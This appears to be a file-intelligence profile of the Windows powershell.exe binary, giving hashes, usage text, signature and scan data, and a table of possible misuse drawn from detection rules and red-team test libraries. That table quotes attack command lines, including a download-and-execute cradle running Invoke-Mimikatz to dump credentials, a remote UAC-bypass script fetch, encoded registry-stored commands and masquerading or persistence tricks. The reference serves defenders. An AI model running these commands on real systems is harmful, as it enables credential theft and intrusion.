powershell.exe

  • File Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  • Description: Windows PowerShell

Hashes

Type Hash
MD5 5B16D54F2AE6B74DCF863BC0F5E502B5
SHA1 900978683159718D65305D72A57634F043A325F9
SHA256 FCC434CC413E969DE19D329CA4E15CA567DA5DAA1F7E265D96EAF6E3D9D8B2CB
SHA384 372D7B1E716707FBAD1972508A68544911987D1041D15DF190628089993367DACB66DA1B23C14F94B9532B801CF1BED5
SHA512 46AA81FC07EA1EBE60B01B9835F6F09CE51F41AF7D685DF4855192B611E3F4946C847ADFAE4CF03B9418BB97F506E0D85D2A93C7F954A017A13DB8960891366D
SSDEEP 6144:tF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:c5pGVcwW2KXzJ4pdd3klnnWosPhnzq
IMP 194427A488ED1DD0A91731658B071667
PESHA1 D3A5FD76C8FD50C44428569EF5D9AED762755C5D
PE256 97013EA3A38894E49FB786E825D1767B7EDD81F10C147E6402680161C7A98618

Runtime Data

Usage (stdout):


PowerShell[.exe] [-PSConsoleFile <file> | -Version <version>]
    [-NoLogo] [-NoExit] [-Sta] [-Mta] [-NoProfile] [-NonInteractive]
    [-InputFormat {Text | XML}] [-OutputFormat {Text | XML}]
    [-WindowStyle <style>] [-EncodedCommand <Base64EncodedCommand>]
    [-ConfigurationName <string>]
    [-File <filePath> <args>] [-ExecutionPolicy <ExecutionPolicy>]
    [-Command { - | <script-block> [-args <arg-array>]
                  | <string> [<CommandParameters>] } ]

PowerShell[.exe] -Help | -? | /?

-PSConsoleFile
    Loads the specified Windows PowerShell console file. To create a console
    file, use Export-Console in Windows PowerShell.

-Version
    Starts the specified version of Windows PowerShell. 
    Enter a version number with the parameter, such as "-version 2.0".

-NoLogo
    Hides the copyright banner at startup.

-NoExit
    Does not exit after running startup commands.

-Sta
    Starts the shell using a single-threaded apartment.
    Single-threaded apartment (STA) is the default.

-Mta
    Start the shell using a multithreaded apartment.

-NoProfile
    Does not load the Windows PowerShell profile.

-NonInteractive
    Does not present an interactive prompt to the user.

-InputFormat
    Describes the format of data sent to Windows PowerShell. Valid values are
    "Text" (text strings) or "XML" (serialized CLIXML format).

-OutputFormat
    Determines how output from Windows PowerShell is formatted. Valid values
    are "Text" (text strings) or "XML" (serialized CLIXML format).

-WindowStyle
    Sets the window style to Normal, Minimized, Maximized or Hidden.

-EncodedCommand
    Accepts a base-64-encoded string version of a command. Use this parameter 
    to submit commands to Windows PowerShell that require complex quotation 
    marks or curly braces.

-ConfigurationName
    Specifies a configuration endpoint in which Windows PowerShell is run.
    This can be any endpoint registered on the local machine including the
    default Windows PowerShell remoting endpoints or a custom endpoint having
    specific user role capabilities.
    
-File
    Runs the specified script in the local scope ("dot-sourced"), so that the 
    functions and variables that the script creates are available in the 
    current session. Enter the script file path and any parameters. 
    File must be the last parameter in the command, because all characters 
    typed after the File parameter name are interpreted 
    as the script file path followed by the script parameters.

-ExecutionPolicy
    Sets the default execution policy for the current session and saves it 
    in the $env:PSExecutionPolicyPreference environment variable. 
    This parameter does not change the Windows PowerShell execution policy 
    that is set in the registry.

-Command
    Executes the specified commands (and any parameters) as though they were
    typed at the Windows PowerShell command prompt, and then exits, unless 
    NoExit is specified. The value of Command can be "-", a string. or a
    script block.

    If the value of Command is "-", the command text is read from standard
    input.

    If the value of Command is a script block, the script block must be enclosed
    in braces ({}). You can specify a script block only when running PowerShell.exe
    in Windows PowerShell. The results of the script block are returned to the
    parent shell as deserialized XML objects, not live objects.

    If the value of Command is a string, Command must be the last parameter
    in the command , because any characters typed after the command are 
    interpreted as the command arguments.

    To write a string that runs a Windows PowerShell command, use the format:
	"& {<command>}"
    where the quotation marks indicate a string and the invoke operator (&)
    causes the command to be executed.

-Help, -?, /?
    Shows this message. If you are typing a PowerShell.exe command in Windows
    PowerShell, prepend the command parameters with a hyphen (-), not a forward
    slash (/). You can use either a hyphen or forward slash in Cmd.exe.

EXAMPLES
    PowerShell -PSConsoleFile SqlSnapIn.Psc1
    PowerShell -version 2.0 -NoLogo -InputFormat text -OutputFormat XML
    PowerShell -ConfigurationName AdminRoles
    PowerShell -Command {Get-EventLog -LogName security}
    PowerShell -Command "& {Get-EventLog -LogName security}"

    # To use the -EncodedCommand parameter:
    $command = 'dir "c:\program files" '
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
    $encodedCommand = [Convert]::ToBase64String($bytes)
    powershell.exe -encodedCommand $encodedCommand

Child Processes:

conhost.exe

Open Handles:

Path Type
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll File
(R-D) C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll File
(R-D) C:\Windows\System32\en-US\crypt32.dll.mui File
(R-D) C:\Windows\System32\en-US\winnlsres.dll.mui File
(R-D) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\powershell.exe.mui File
(RW-) C:\Users\user\Documents File
(RW-) C:\Windows File
...\Cor_SxSPublic_IPCBlock Section
\BaseNamedObjects__ComCatalogCache__ Section
\BaseNamedObjects\Cor_Private_IPCBlock_v4_4356 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\1\BaseNamedObjects\windows_shell_global_counters Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: PowerShell.EXE.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/66
  • VirusTotal Link: https://www.virustotal.com/gui/file/fcc434cc413e969de19d329ca4e15ca567da5daa1f7e265d96eaf6e3d9d8b2cb/detection/

File Similarity (ssdeep match)

File Score
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 82
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 86
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe 83
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 86
C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe 74
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe 83
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 83
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 85
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 86
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 85
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 85
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 99
C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 72

Possible Misuse

The following table contains possible examples of powershell.exe being misused. While powershell.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\powershell.exe' DRL 1.0
sigma win_powershell_snapins_hafnium.yml Image: '*\powershell.exe' DRL 1.0
sigma win_bits_client_susp_powershell_job.yml processPath\|endswith: '\powershell.exe' DRL 1.0
sigma win_asr_bypass_via_appvlp_re.yml CommandLine\|re: '(?i).*appvlp.exe.*(cmd.exe\|powershell.exe).*(.sh\|.exe\|.dll\|.bin\|.bat\|.cmd\|.js\|.msh\|.reg\|.scr\|.ps\|.vb\|.jar\|.pl\|.inf)' DRL 1.0
sigma win_susp_logon_explicit_credentials.yml - '\powershell.exe' DRL 1.0
sigma sysmon_powershell_code_injection.yml SourceImage\|endswith: '\powershell.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\powershell.exe' DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml SourceImage\|endswith: '\powershell.exe' DRL 1.0
sigma win_susp_rclone_exec.yml - '\PowerShell.exe' DRL 1.0
sigma file_event_win_creation_system_file.yml - '\powershell.exe' DRL 1.0
sigma file_event_win_detect_powerup_dllhijacking.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma file_event_win_macro_file.yml - \powershell.exe DRL 1.0
sigma file_event_win_powershell_startup_shortcuts.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma file_event_win_susp_adsi_cache_usage.yml - 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe' DRL 1.0
sigma file_event_win_susp_ntds_dit.yml - '\powershell.exe' DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml - '\powershell.exe' DRL 1.0
sigma image_load_alternate_powershell_hosts_moduleload.yml description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe DRL 1.0
sigma image_load_alternate_powershell_hosts_moduleload.yml - '\powershell.exe' DRL 1.0
sigma image_load_in_memory_powershell.yml description: Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. Detects meterpreter's "load powershell" extension. DRL 1.0
sigma image_load_in_memory_powershell.yml - '\powershell.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml # - '\powershell.exe' triggered by installing common software DRL 1.0
sigma image_load_wsman_provider_image_load.yml - '\powershell.exe' DRL 1.0
sigma net_connection_win_powershell_network_connection.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma pipe_created_alternate_powershell_hosts_pipe.yml description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe DRL 1.0
sigma pipe_created_alternate_powershell_hosts_pipe.yml - '\powershell.exe' DRL 1.0
sigma posh_pc_alternate_powershell_hosts.yml description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe DRL 1.0
sigma posh_pc_alternate_powershell_hosts.yml - HostApplication\|startswith: 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' DRL 1.0
sigma posh_pc_renamed_powershell.yml - powershell.exe DRL 1.0
sigma posh_pc_renamed_powershell.yml - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe DRL 1.0
sigma posh_pc_wsman_com_provider_no_powershell.yml description: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application. DRL 1.0
sigma posh_pm_alternate_powershell_hosts.yml description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe DRL 1.0
sigma posh_pm_alternate_powershell_hosts.yml ContextInfo\|contains: 'powershell.exe' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event DRL 1.0
sigma proc_creation_win_abusing_debug_privilege.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_apt_babyshark.yml - powershell.exe mshta.exe http* DRL 1.0
sigma proc_creation_win_apt_muddywater_dnstunnel.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_apt_wocao.yml - 'cmd /c powershell.exe -ep bypass -file c:\s.ps1' DRL 1.0
sigma proc_creation_win_dnscat2_powershell_implementation.yml ParentImage\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_exploit_cve_2020_10189.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_html_help_spawn.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_mmc_spawn_shell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_multiple_suspicious_cli.yml - powershell.exe DRL 1.0
sigma proc_creation_win_new_service_creation.yml - Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_non_interactive_powershell.yml description: Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent. DRL 1.0
sigma proc_creation_win_non_interactive_powershell.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_bitsjob.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_cmdline_reversed_strings.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_cmdline_special_characters.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_cmdline_specific_comb_methods.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_disable_windef_av.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_downgrade_attack.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_download.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_reverse_shell_connection.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_powershell_suspicious_parameter_variation.yml - '\Powershell.exe' DRL 1.0
sigma proc_creation_win_powersploit_empire_schtasks.yml ParentImage\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_remote_time_discovery.yml - Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'powershell.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'powershell.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_renamed_powershell.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_run_powershell_script_from_ads.yml ParentImage\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_run_powershell_script_from_ads.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_run_powershell_script_from_input_stream.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_screenconnect_anomaly.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_shadow_copies_creation.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_shadow_copies_deletion.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_mshta.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_susp_program.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_bitstransfer.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_crackmapexec_execution.yml - 'powershell.exe -exec bypass -noni -nop -w 1 -C "' DRL 1.0
sigma proc_creation_win_susp_crackmapexec_execution.yml - 'powershell.exe -noni -nop -w 1 -enc ' DRL 1.0
sigma proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml CommandLine\|contains: 'powershell.exe' DRL 1.0
sigma proc_creation_win_susp_eventlog_clear.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_pester.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_encode.yml Image\|endswith: \powershell.exe DRL 1.0
sigma proc_creation_win_susp_powershell_hidden_b64_cmd.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_parent_combo.yml Image\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_parent_process.yml description: Detects a suspicious parents of powershell.exe DRL 1.0
sigma proc_creation_win_susp_ps_appdata.yml - 'powershell.exe' DRL 1.0
sigma proc_creation_win_susp_rclone_execution.yml - '\PowerShell.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml ParentImage\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - 'powershell.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_temp.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_from_mssql.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_from_winrm.yml - '*\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml Image\|endswith: \powershell.exe DRL 1.0
sigma proc_creation_win_susp_use_of_csharp_console.yml ParentImage\|endswith: '\powershell.exe' DRL 1.0
sigma proc_creation_win_susp_whoami_anomaly.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_system_exe_anomaly.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_vmtoolsd_susp_child_process.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_webshell_spawn.yml - '\powershell.exe' DRL 1.0
sigma proc_creation_win_wmi_spwns_powershell.yml - '\powershell.exe' DRL 1.0
sigma sysmon_accessing_winapi_in_powershell_credentials_dumping.yml SourceImage\|endswith: '\powershell.exe' DRL 1.0
sigma sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml - '\powershell.exe' DRL 1.0
LOLBAS Powershell.yml Name: Powershell.exe  
LOLBAS Powershell.yml - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  
LOLBAS Powershell.yml - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  
LOLBAS CL_LoadAssembly.yml - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'  
LOLBAS UtilityFunctions.yml - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”'  
LOLBAS Agentexecutor.yml Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument  
LOLBAS Agentexecutor.yml Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully  
LOLBAS Appvlp.yml - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"  
LOLBAS Appvlp.yml Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.  
LOLBAS Appvlp.yml - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"  
LOLBAS Mftrace.yml - Command: Mftrace.exe powershell.exe  
LOLBAS Mftrace.yml Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.  
LOLBAS Remote.yml - Command: Remote.exe /s "powershell.exe" anythinghere  
malware-ioc misp-dukes-operation-ghost-event.json "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.\n\n### Windows\nThere are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. (Citation: PowerShell About 2019)\n\n### Mac\nThe configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)\n", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via Spearphishing Attachment with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via Spearphishing Link that leads to exploitation of a browser or application vulnerability via Exploitation for Client Execution. While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.\n\nDetection: Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate\/Decode Files or Information in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and execuited on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: Anti-virus, Process command-line parameters, Process monitoring\n\nPermissions Required: User", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.\n\nDetection: Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: File monitoring, Packet capture, Mail server, Network intrusion detection system, Detonation chamber, Email gateway", © ESET 2014-2018
atomic-red-team index.md - Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1027.md powershell.exe -EncodedCommand $EncodedCommand MIT License. © 2018 Red Canary
atomic-red-team T1027.md powershell.exe -Command “IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))” MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.doc.ps1 MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.pdf.ps1 MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.rtf.ps1 MIT License. © 2018 Red Canary
atomic-red-team T1036.004.md schtasks /create /ru system /sc daily /tr “cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1” /tn win32times /f MIT License. © 2018 Red Canary
atomic-red-team T1049.md Upon successful execution, powershell.exe will execute get-NetTCPConnection. Results will output via stdout. MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md schtasks.exe /Create /F /TN “ATOMIC-T1053.005” /TR “cmd /c start /min "" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\ATOMIC-T1053.005).test)))” /sc daily /st #{time} MIT License. © 2018 Red Canary
atomic-red-team T1055.001.md Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell’s underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘#{mimurl}’); Invoke-Mimikatz -DumpCreds” MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1’); Invoke-AppPathBypass -Payload ‘C:\Windows\System32\cmd.exe’” MIT License. © 2018 Red Canary
